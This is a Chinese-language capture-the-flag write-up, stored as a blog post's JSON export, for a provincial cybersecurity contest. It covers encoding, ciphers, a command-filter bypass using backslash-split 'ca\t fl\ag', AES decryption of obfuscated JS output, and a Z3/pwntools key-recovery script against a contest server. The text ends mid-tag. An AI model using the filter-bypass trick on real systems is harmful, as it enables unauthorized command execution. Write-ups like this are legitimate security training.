{"id":100,"date":"2025-12-27T16:29:06","date_gmt":"2025-12-27T08:29:06","guid":{"rendered":"https:\/\/blog.ichenfu.cn\/?p=100"},"modified":"2026-03-09T16:43:17","modified_gmt":"2026-03-09T08:43:17","slug":"%e6%b2%b3%e5%8d%97%e7%9c%81%e7%ac%ac%e4%b8%83%e5%b1%8a%e9%87%91%e7%9b%be%e4%bf%a1%e5%ae%89%e6%9d%af%e7%bd%91%e7%bb%9c%e5%ae%89%e5%85%a8%e5%a4%a7%e8%b5%9b%e7%ac%ac%e4%ba%8c%e6%ac%a1%e9%a2%98","status":"publish","type":"post","link":"https:\/\/blog.ichenfu.cn\/index.php\/2025\/12\/27\/%e6%b2%b3%e5%8d%97%e7%9c%81%e7%ac%ac%e4%b8%83%e5%b1%8a%e9%87%91%e7%9b%be%e4%bf%a1%e5%ae%89%e6%9d%af%e7%bd%91%e7%bb%9c%e5%ae%89%e5%85%a8%e5%a4%a7%e8%b5%9b%e7%ac%ac%e4%ba%8c%e6%ac%a1%e9%a2%98\/","title":{"rendered":"\u6cb3\u5357\u7701\u7b2c\u4e03\u5c4a\u91d1\u76fe\u4fe1\u5b89\u676f\u7f51\u7edc\u5b89\u5168\u5927\u8d5b\u7b2c\u4e8c\u6b21\u9898\u89e3(WriteUp)"},"content":{"rendered":"\n<h3 class=\"wp-block-heading has-text-align-center\"><strong>\u9898\u76ee\u4e00 \u7b7e\u5230<\/strong><\/h3>\n\n\n\n<h4 class=\"wp-block-heading\">\u64cd\u4f5c\u5185\u5bb9\uff1a<\/h4>\n\n\n\n<p>ZmxhZ3tmYjI0MzAyNS1kMjA0LTRlZGEtYjNkYy01MGZlZmExMDg5ZmR9<\/p>\n\n\n\n<p>Base64\u89e3\u7801\u5f97\u5230flag{fb243025-d204-4eda-b3dc-50fefa1089fd}<\/p>\n\n\n\n<h4 class=\"wp-block-heading\">flag\u503c\uff1a<\/h4>\n\n\n\n<p>flag{fb243025-d204-4eda-b3dc-50fefa1089fd}<\/p>\n\n\n\n<p><\/p>\n\n\n\n<h3 class=\"wp-block-heading has-text-align-center\">\u9898\u76ee\u4e8c c1assicalcrypt03asy<\/h3>\n\n\n\n<h4 class=\"wp-block-heading\">\u64cd\u4f5c\u5185\u5bb9\uff1a<\/h4>\n\n\n\n<p>\u7ecf\u5178\u6362\u8868\u5bc6\u7801\uff0c\u7ed9\u7684\u56fe\u7247\u5206\u522b\u662f\u590f\u591a\u3001\u8df3\u821e\u7684\u5c0f\u4eba\u3001\u5723\u5802\u6b66\u58eb\u3001<a href=\"https:\/\/kryptografie.de\/kryptografie\/chiffre\/futurama.htm\" target=\"_blank\"  rel=\"nofollow\" >https:\/\/kryptografie.de\/kryptografie\/chiffre\/futurama.htm<\/a>\uff0c\u5bf9\u51fa\u6765\u7684\u5185\u5bb9\u662fc1assicalcrypt03asy\uff0c\u76f4\u63a5\u4ea4\u5c31\u884c<\/p>\n\n\n\n<h4 class=\"wp-block-heading\">flag\u503c\uff1a<\/h4>\n\n\n\n<p>flag{c1assicalcrypt03asy}<\/p>\n\n\n\n<p><\/p>\n\n\n\n<h3 class=\"wp-block-heading has-text-align-center\">\u9898\u76ee\u4e09 shell<\/h3>\n\n\n\n<h4 class=\"wp-block-heading\">\u64cd\u4f5c\u5185\u5bb9\uff1a<\/h4>\n\n\n\n<p>\u94fe\u63a5\u9776\u673a\u53d1\u73b0\u662f\u53ef\u4ee5\u6267\u884c\u90e8\u5206\u6267\u884c\u7684\uff0c\u4f46\u662f\u65e0\u6cd5\u6b63\u5e38cat flag<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/ucnk6iul0pyw.feishu.cn\/space\/api\/box\/stream\/download\/asynccode\/?code=MWI4MzNiZjc5MmVhNjFhMjc2ZDhlYjY3NTJlYzk1MzJfdE1HdmRaQUFRVFBKYWVqZTE3a3BhVWZ1eGJnb2padzlfVG9rZW46RHVhUmJGeHpLbzhYZ094SDFaN2MzQ3dubjdiXzE3NzMwNDQ2MDk6MTc3MzA0ODIwOV9WNA\" alt=\"\"\/><\/figure>\n\n\n\n<p>\u53ef\u4ee5\u76f4\u63a5\u7528ca\\t fl\\ag\u505a\u5206\u9694\u7ed5\u8fc7<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/ucnk6iul0pyw.feishu.cn\/space\/api\/box\/stream\/download\/asynccode\/?code=YWUzNjQxYjMzMDdlNzk5NDAwMmU4MWM0MWZlMWUzMWVfcW9OOVlMQXVSMkhoc3F2WDNBZ1B6a25hMWJjcEZrclZfVG9rZW46RzEybmJhU2pMb0pTVUN4NlhYZmNUeUlRbmFkXzE3NzMwNDQ2MDk6MTc3MzA0ODIwOV9WNA\" alt=\"\"\/><\/figure>\n\n\n\n<h4 class=\"wp-block-heading\">flag\u503c\uff1a<\/h4>\n\n\n\n<p>flag{25d6fc62-b293-4c59-8f20-9f16fa9e375d}<\/p>\n\n\n\n<p><\/p>\n\n\n\n<h3 class=\"wp-block-heading has-text-align-center\">\u9898\u76ee\u56db van-you-see<\/h3>\n\n\n\n<h4 class=\"wp-block-heading\">\u64cd\u4f5c\u5185\u5bb9\uff1a<\/h4>\n\n\n\n<p>2048\u627e\u5230\u4e00\u4e2a\u88ab\u6df7\u6dc6sojson.v4 \u4e24\u5c42\u6df7\u6dc6\u7684js\u6587\u4ef6\uff0c\u89e3\u5bc6\u4e4b\u540e\u5f97\u5230\u7684\u4e3b\u8981\u903b\u8f91\u662f\u914d\u5408html\u7684showflag\u7684window.location.href + '\/u0cNTzvI5' + 'QprXH.php' \u8bf7\u6c42u0cNTzvI5QprXH.php\u83b7\u53d6\u5bc6\u6587\u4e4b\u540e\u6839\u636e\u5bf9\u5e94\u7684AES\u7684key iv\u8fdb\u884c\u89e3\u5bc6\uff0c\u7136\u540e\u5c31\u53ef\u4ee5\u62ff\u5230flag<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/ucnk6iul0pyw.feishu.cn\/space\/api\/box\/stream\/download\/asynccode\/?code=ZDUxMjlkYWYyZmUzN2UxZjdhODliNjQ2YjljZDgxNGJfYjVMa0x5UnB6bkY1TUphdXVFVHA2WWZkUE9za1ZQZmtfVG9rZW46RFpKc2JmNVpTbzN0S3N4eFNwcGNpU3lDbnVjXzE3NzMwNDQ2MDk6MTc3MzA0ODIwOV9WNA\" alt=\"\"\/><\/figure>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/ucnk6iul0pyw.feishu.cn\/space\/api\/box\/stream\/download\/asynccode\/?code=OWE5MGVlOWY5YzA4YWQ1MzY5MmI3NDE0M2U2ZmE5NTFfckNScnlWenNZYXl4YngxMXpVWE5qR3hnbnJSRDdCOThfVG9rZW46QThtOWIycWFlb01tRXF4WDlHdGNkamJTblpwXzE3NzMwNDQ2MDk6MTc3MzA0ODIwOV9WNA\" alt=\"\"\/><\/figure>\n\n\n\n<p>\u5982\u8be5\u9898\u4f7f\u7528\u81ea\u5df1\u7f16\u5199\u7684\u811a\u672c\u8bf7\u8be6\u7ec6\u5199\u51fa\uff0c\u4e0d\u5141\u8bb8\u622a\u56fe<\/p>\n\n\n\n<figure class=\"wp-block-table\"><table class=\"has-fixed-layout\"><tbody><tr><td><em>from<\/em> Crypto.Cipher <em>import<\/em> AES<br><em>import<\/em> base64<br>&nbsp;<br>encrypted_data =&nbsp;&nbsp; \"OT95wMwexdoLvds7rIFfeth2Dk38aU5Ax5YSQ71aRHCbqkybxngkXreRlhNTaUTS\"<br>&nbsp;<br>key = b'1267c0a3849d5bef'<br>iv&nbsp; = b'af16d2be89745c30'<br>&nbsp;<br>def <strong>decrypt<\/strong>(<em>data_b64<\/em>):<br>&nbsp;&nbsp;&nbsp; <em>try<\/em>:<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; cipher_text =&nbsp;&nbsp; base64.b64decode(<em>data_b64<\/em>)<br>&nbsp;&nbsp;&nbsp; <em>except<\/em>:<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <em>try<\/em>:<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; cipher_text =&nbsp;&nbsp; bytes.fromhex(<em>data_b64<\/em>)<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <em>except<\/em>:<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; print(\"\u65e0\u6cd5\u8bc6\u522b\u7684\u5bc6\u6587\u683c\u5f0f\")<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <em>return<\/em><br>&nbsp;<br>&nbsp;&nbsp;&nbsp; cipher = AES.new(key, AES.MODE_CBC, iv)<br>&nbsp;&nbsp;&nbsp; decrypted = cipher.decrypt(cipher_text)<br>&nbsp;&nbsp;&nbsp;<br>&nbsp;&nbsp;&nbsp; pad_len = decrypted[-1]<br>&nbsp;&nbsp;&nbsp; <em>return<\/em>&nbsp;&nbsp; decrypted[:-pad_len].decode('utf-8')<br>&nbsp;<br>print(\"Flag:\", decrypt(encrypted_data))<em>from<\/em> Crypto.Cipher <em>import<\/em> AES<br><em>import<\/em> base64<br>&nbsp;<br>encrypted_data =&nbsp;&nbsp; \"OT95wMwexdoLvds7rIFfeth2Dk38aU5Ax5YSQ71aRHCbqkybxngkXreRlhNTaUTS\"<br>&nbsp;<br>key = b'1267c0a3849d5bef'<br>iv&nbsp; = b'af16d2be89745c30'<br>&nbsp;<br>def <strong>decrypt<\/strong>(<em>data_b64<\/em>):<br>&nbsp;&nbsp;&nbsp; <em>try<\/em>:<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; cipher_text =&nbsp;&nbsp; base64.b64decode(<em>data_b64<\/em>)<br>&nbsp;&nbsp;&nbsp; <em>except<\/em>:<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <em>try<\/em>:<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; cipher_text =&nbsp;&nbsp; bytes.fromhex(<em>data_b64<\/em>)<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <em>except<\/em>:<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; print(\"\u65e0\u6cd5\u8bc6\u522b\u7684\u5bc6\u6587\u683c\u5f0f\")<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <em>return<\/em><br>&nbsp;<br>&nbsp;&nbsp;&nbsp; cipher = AES.new(key, AES.MODE_CBC, iv)<br>&nbsp;&nbsp;&nbsp; decrypted = cipher.decrypt(cipher_text)<br>&nbsp;&nbsp;&nbsp;<br>&nbsp;&nbsp;&nbsp; pad_len = decrypted[-1]<br>&nbsp;&nbsp;&nbsp; <em>return<\/em>&nbsp;&nbsp; decrypted[:-pad_len].decode('utf-8')<br>&nbsp;<br>print(\"Flag:\", decrypt(encrypted_data))<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<h4 class=\"wp-block-heading\">flag\u503c\uff1a<\/h4>\n\n\n\n<p>flag{56a282fd-3855-4692-a6e7-1146690fd4b0}<\/p>\n\n\n\n<p><\/p>\n\n\n\n<h3 class=\"wp-block-heading has-text-align-center\">\u9898\u76ee\u4e94 CathylinFour++<\/h3>\n\n\n\n<h4 class=\"wp-block-heading\">\u64cd\u4f5c\u5185\u5bb9\uff1a<\/h4>\n\n\n\n<p>\u4ee3\u7801\u7ed9\u51fa\u4e00\u4e2a\u7b80\u5355\u7684SPN\u7ed3\u6784\uff0c\u7531\u4e8e\u52a0\u5bc6\u7cfb\u7edf\u5904\u7406\u7684\u6570\u636e\u53ea\u670965536\u4e2d\u53ef\u80fd\uff0c\u53ef\u4ee5\u76f4\u63a5\u7206\u7834\uff0c\u7ecf\u8fc73\u8f6e\u52a0\u5bc6\uff0c\u6bcf\u8f6e\u90fd\u6709Key Sbox Pbox\uff0c\u4e0d\u8fc7\u5728\u7206\u7834\u51fa\u6765\u7684\u8bdd\u4f1a\u544a\u8bc9\u5bf9\u5e94\u7684\u660e\u6587\uff0c\u90a3\u4e48\u53ea\u9700\u8981\u8ba1\u7b97\u51fa\u6700\u540e\u4e00\u987f\u79d8\u94a5K3\u5c31\u53ef\u4ee5\u548cmask\u5f02\u6216\u4e00\u4e0b\u53d1\u8fc7\u53bb\u5c31\u80fd\u62ff\u5230flag\uff0c\u8fd9\u91cc\u7528Z3\u7ea6\u675f\u8868\u8fbe\u5f0f\u8fdb\u884c\u8ba1\u7b97\uff0c\u5148\u628a\u79d8\u94a5\u5e72\u4e86\u7136\u540e\u6309\u7167\u521a\u624d\u8bf4\u7684\u601d\u8def\u81ea\u52a8\u6c42\u89e3\u5c31\u53ef\u4ee5\u4e86\uff08\u6df1\u4e95base64\u5f53flag\uff09<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/ucnk6iul0pyw.feishu.cn\/space\/api\/box\/stream\/download\/asynccode\/?code=NzdkMDVmM2E4ZTYxYTkxMDk3M2Y5MzhjN2FkMWMxZTFfQWJ0RFU3Z093TTg3RHlSTmNNUGF4MHQzYmV5YTNWZDhfVG9rZW46VXplR2JIVTh5b21ZUHR4YVFBemNBSUpsblBlXzE3NzMwNDQ2MDk6MTc3MzA0ODIwOV9WNA\" alt=\"\"\/><\/figure>\n\n\n\n<p>\u5982\u8be5\u9898\u4f7f\u7528\u81ea\u5df1\u7f16\u5199\u7684\u811a\u672c\u8bf7\u8be6\u7ec6\u5199\u51fa\uff0c\u4e0d\u5141\u8bb8\u622a\u56fe<\/p>\n\n\n\n<figure class=\"wp-block-table\"><table class=\"has-fixed-layout\"><tbody><tr><td><em>#!\/usr\/bin\/env&nbsp;&nbsp; python3<\/em><br><em>from<\/em> pwn <em>import<\/em> *<br><em>from<\/em> z3 <em>import<\/em> *<br>&nbsp;<br>context.log_level = 'info'<br>&nbsp;<br>class CryptoSolver:<br>&nbsp;&nbsp;&nbsp; def __init__(<em>self<\/em>):<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; self.S_BOX = [0xC, 0x5, 0x6, 0xB, 0x9, 0x0, 0xA, 0xD, 0x3, 0xE, 0xF, 0x8,&nbsp;&nbsp; 0x4, 0x7, 0x1, 0x2]<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; self.P_MAP = [0, 5, 10, 15, 4, 9, 14, 3, 8, 13, 2, 7, 12, 1, 6, 11]<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; self.ROUND_KEYS = [0x0F0F, 0x3333, 0x55AA]<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; self.solver = Solver()<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; self.k_vars = [BitVec(f'k_{i}', 16) <em>for<\/em> i <em>in<\/em> range(4)]<br>&nbsp;<br>&nbsp;&nbsp;&nbsp; def _sbox_sub(<em>self<\/em>,&nbsp;&nbsp; <em>block_16bit<\/em>):<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; res_nibbles = []<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <em>for<\/em>&nbsp;&nbsp; i <em>in<\/em> range(4):<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <em># \u63d0\u53d64\u4f4d (nibble)<\/em><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; nibble = Extract(15 - i*4, 12 - i*4, block_16bit)<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <em># \u6784\u5efa\u66ff\u6362\u903b\u8f91<\/em><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; temp = BitVecVal(0, 4)<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <em>for<\/em> val <em>in<\/em> range(16):<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <em># \u4f7f\u7528 Z3 \u7684 If \u8868\u8fbe\u5f0f\u6620\u5c04 S \u76d2<\/em><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; temp = If(nibble == val,&nbsp;&nbsp; BitVecVal(self.S_BOX[val], 4), temp)<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; res_nibbles.append(temp)<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <em>return<\/em>&nbsp;&nbsp; Concat(*res_nibbles)<br>&nbsp;<br>&nbsp;&nbsp;&nbsp; def _permute(<em>self<\/em>,&nbsp;&nbsp; <em>block_16bit<\/em>):<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; bits = [Extract(15-i, 15-i, block_16bit) <em>for<\/em> i <em>in<\/em> range(16)]<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; new_bits = [None] * 16<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <em>for<\/em>&nbsp;&nbsp; i <em>in<\/em> range(16):<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; target_idx = self.P_MAP[i]<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; new_bits[target_idx] = bits[i]<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <em>return<\/em>&nbsp;&nbsp; Concat(*new_bits)<br>&nbsp;<br>&nbsp;&nbsp;&nbsp; def&nbsp;&nbsp; encrypt_symbolic(<em>self<\/em>, <em>plain_int<\/em>):<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; \"\"\"\u6784\u5efa\u52a0\u5bc6\u6d41\u7a0b\u7684\u7ea6\u675f\u6a21\u578b\"\"\"<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; state = BitVecVal(plain_int, 16)<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <em>for<\/em>&nbsp;&nbsp; r <em>in<\/em> range(2):<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; state = state ^ self.k_vars[r] ^ self.ROUND_KEYS[r]<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; state = self._sbox_sub(state)<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; state = self._permute(state)<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; state = state ^ self.k_vars[2] ^ self.ROUND_KEYS[2]<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; state = self._sbox_sub(state)<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; final_cipher = state ^ self.k_vars[3]<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <em>return<\/em>&nbsp;&nbsp; final_cipher<br>&nbsp;<br>&nbsp;&nbsp;&nbsp; def add_pair(<em>self<\/em>,&nbsp;&nbsp; <em>p<\/em>, <em>c<\/em>):<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; self.solver.add(self.encrypt_symbolic(p) == c)<br>&nbsp;<br>&nbsp;&nbsp;&nbsp; def solve_key(<em>self<\/em>):<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <em>if<\/em>&nbsp;&nbsp; self.solver.check() == sat:<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; m = self.solver.model()<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <em>return<\/em> m[self.k_vars[3]].as_long()<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <em>else<\/em>:<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <em>return<\/em> None<br>&nbsp;<br>def main():<br>&nbsp;&nbsp;&nbsp; io =&nbsp;&nbsp; remote(123.57.26.77, 36158)<br>&nbsp;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; io.recvuntil(b\"mask = \")<br>&nbsp;&nbsp;&nbsp; raw_mask =&nbsp;&nbsp; io.recvline().strip()<br>&nbsp;&nbsp;&nbsp; mask =&nbsp;&nbsp; int(raw_mask, 16)<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; log.info(f\"Mask captured: {hex(mask)}\")<br>&nbsp;<br>&nbsp;&nbsp;&nbsp; solver_engine&nbsp;&nbsp; = CryptoSolver()<br>&nbsp;&nbsp;&nbsp; test_inputs =&nbsp;&nbsp; list(range(6))<br>&nbsp;&nbsp;&nbsp;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; log.info(\"Collecting P\/C pairs...\")<br>&nbsp;&nbsp;&nbsp; <em>for<\/em> pt <em>in<\/em>&nbsp;&nbsp; test_inputs:<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; io.recvuntil(b\"Your input: \")<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; io.sendline(hex(pt).encode())<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; res = io.recvline().decode()<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <em>if<\/em>&nbsp;&nbsp; \"Output\" in res:<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ct_str = res.split(\"Output: \")[1].strip()<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ct = int(ct_str, 16)<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; solver_engine.add_pair(pt, ct)<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <em>else<\/em>:<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; log.warning(f\"Unexpected response: {res}\")<br>&nbsp;<br>&nbsp;&nbsp;&nbsp; k3_val =&nbsp;&nbsp; solver_engine.solve_key()<br>&nbsp;&nbsp;&nbsp;<br>&nbsp;&nbsp;&nbsp; <em>if<\/em>&nbsp;&nbsp; k3_val is not None:<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; log.success(f\"Key3 found: {hex(k3_val)}\")<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ans = k3_val ^ mask<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; io.sendlineafter(b\"Your input: \", b\"k\")<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; io.sendlineafter(b\"proof (hex): \", hex(ans).encode())<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; final_res = io.recvall(<em>timeout<\/em>=3).decode()<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; print(\"\\n\" + \"=\"*30)<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; print(final_res.strip())<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; print(\"=\"*30 + \"\\n\")<br>&nbsp;&nbsp;&nbsp; <em>else<\/em>:<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; log.error(\"Unsatisfiable constraints.\")<br>&nbsp;<br>&nbsp;&nbsp;&nbsp; io.close()<br>&nbsp;<br><em>if<\/em> __name__ == '__main__':<br>&nbsp;&nbsp;&nbsp; main()<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<h4 class=\"wp-block-heading\">flag\u503c\uff1a<\/h4>\n\n\n\n<p>ZmxhZ3swZDI5NzEyNi1mYTY2LTQ0MjUtYjkxZC1iMTYxYWRjNDM1NzR9<\/p>\n\n\n\n<p><\/p>\n\n\n\n<h3 class=\"wp-block-heading has-text-align-center\">\u9898\u76ee\u516d lowre<\/h3>\n\n\n\n<h4 class=\"wp-block-heading\">\u64cd\u4f5c\u5185\u5bb9\uff1a<\/h4>\n\n\n\n<p>\u8fd9\u9898\u662f\u81ea\u5b9a\u4e49VM\uff0c\u903b\u8f91\u4e3b\u8981\u5728\u4e8e\u5904\u7406main\u51fd\u6570\u7684\u9a8c\u8bc1\u4e4b\u540e\u8c03\u5230run_vm_inner\u91cc\u9762\uff0c\u80fd\u770b\u5230\u5b57\u8282\u7801\u5904\u7406\u903b\u8f91\uff0c\u5012\u7740\u5904\u7406\u6570\u636e\u4e4b\u540e\u4e0e0x5A\u8fdb\u884c\u5f02\u6216\u5f97\u5230\u771f\u6b63\u7684\u6307\u4ee4\uff0c\u7136\u540e\u8c03\u5230run_ir\u90e8\u5206\uff0c\u5bf9\u5e94\u7684opcode\u5c31\u662f\u5f02\u6216\u6821\u9a8c\uff0c\u7531\u4e8e\u4e24\u8fb9\u76f4\u63a5\u62b5\u6d88\uff0c\u6240\u4ee5\u4e0d\u9700\u8981\u7ba1\uff0c\u53ea\u9700\u8981\u77e5\u9053\u662f\u6211\u4eec \u8f93\u5165\u7684\u5185\u5bb9^0xAA \u80fd\u5f97\u5230\u6211\u4eec\u60f3\u8981\u7684\u6570\u636e\u5c31\u53ef\u4ee5\u4e86\uff0c\u7531\u4e8e\u662f\u5728\u7a0b\u5e8f\u91cc\u9762\u751f\u6210\u7684\uff0c\u76f4\u63a5\u52a8\u8c03\u5c31\u80fd\u62ff\u5230\uff0c\u7528pwndbg\u5728run_vm_inner\u4e0b\u65ad\u70b9\uff0c\u518drdx\u62ff\u6570\u636e\u5c31\u53ef\u4ee5\u4e86<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" 